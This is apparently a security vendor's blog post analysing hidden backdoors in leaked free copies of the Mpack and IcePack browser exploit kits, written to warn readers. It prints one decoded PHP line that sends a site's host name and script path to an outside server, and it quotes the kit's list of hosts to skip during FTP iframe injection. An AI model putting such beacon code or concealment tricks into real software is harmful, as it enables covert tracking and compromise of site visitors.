Honor Among Thieves?

The Mpack and IcePack exploit packages havebeen on sale for some time. Now, free releases of these tools are beingdistributed, but are these free distributions all they are supposed tobe? While examining these free releases we discovered some surprises.

The Mpack and IcePack exploit packages are designed fornon-technical users. They group exploits together into one easy toinstall package and using this package, non-technical users can runexploits on the browsers of unsuspecting visitors. Ultimately thisgrants non-technical attackers the ability to infect visitors to theirsites without having to know how exactly it happens.

When these packs were first released they sold in the undergroundfor over $1,000 apiece. The packs are installed with minimumconfiguration and effort and all that the controller needs to do isattract users to the exploit site. When one of these exploit sites isopened in a visitor's browser, the exploits are run and if the user isvulnerable a malware of the controllers’ choice will be run on thevisitor's machine.

However, somewhere along the line the code for the original packswas leaked and people started to distribute it for free or for vastlyreduced prices. These free packs are now being distributed freely inhacking forums. We tested two of these packs in the lab and found somesurprises. The packs that are being distributed freely contain abackdoor (or two). These free packs are fully functional and allowwhoever installs them to infect visitors to their page just as would beexpected. However, the packs also contain extra code that will silentlydirect the visitor to an additional exploit server. This additionalserver is hosted in Russia and in one example was still live whentested recently, even though these "backdoored" packs have beenavailable for a few months now.

The result of all of this is that whenever a hacker installs one ofthese free packs and starts attracting visitors to it, he is alsounknowingly attracting visitors to the Russian exploit site, too. Sothis Russian site is getting free visitors from every install of thesepacks - a sort of commission, as it were!

With the free Mpack exploit pack there are two backdoors included. Thetwo backdoors are placed in different files within the pack and wouldbe difficult to find without being very familiar with the Mpack code.Both are encoded in JavaScript. Obviously we will not include the exactcode from the pack here—that would make it far too easy for scriptkiddies to remove it. Instead we show how the code looks when it is"un-escaped" / decoded:

This eventually leads to an iframe tag being added to the visitorspage, redirecting them to the Russian Mpack server. We have alsoobserved what appears to have been a backdoor within the free IcePackcode. This backdoor is encoded in base64 so it stands out a little morein the code and thus is easier to spot; however, it is appended at theend of a long line of unrelated code so unless you scroll all the wayto the right it might be missed. Again displayed here is the result ofdecoding the original line of code:

file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);

This server is not returning anything interesting at the moment, soit is hard to tell what exactly its function is. Perhaps it was used totrack the number of installations? However, from where is placed andfrom the way it is encoded we have no doubt that this code is up to nogood.

Another interesting line of code take from the free IcePack code isa list of servers where the distributors would prefer you not to addiframes. IcePack contains an ftp checker script that can log intolegitimate ftp servers in order to add a redirect to an exploit server.(Normally achieved by adding an iframe tag) Before logging in to the anftp server the IcePack code first checks if the Web site is on thebanned list - shown below - and if it is, it blocks the login attempt:

$bad_hosts = array ( 'boom.ru', 'narod.ru', 'jino-net.ru','fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru','h16.ru', '110mb.com', 'by.ru', 'tripod.com');

This $bad_hosts list shows sites where the people who released thisfree IcePack code would prefer you not to put iframes. Perhaps theseare sites they use or control, but it’s not surprising that most ofthese sites are Russian (both Mpack and IcePack are coded by Russiangroups).

Since we have not purchased the real versions of these packs wecannot say for certain that any / all of the code mentioned here is notincluded in the real version of these packs. It just goes to show thatthe same caution is needed in the underground just as in the realworld; caveat emptor. As for the free versions of these packs, ifsomething looks too good to be true, it probably is. All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.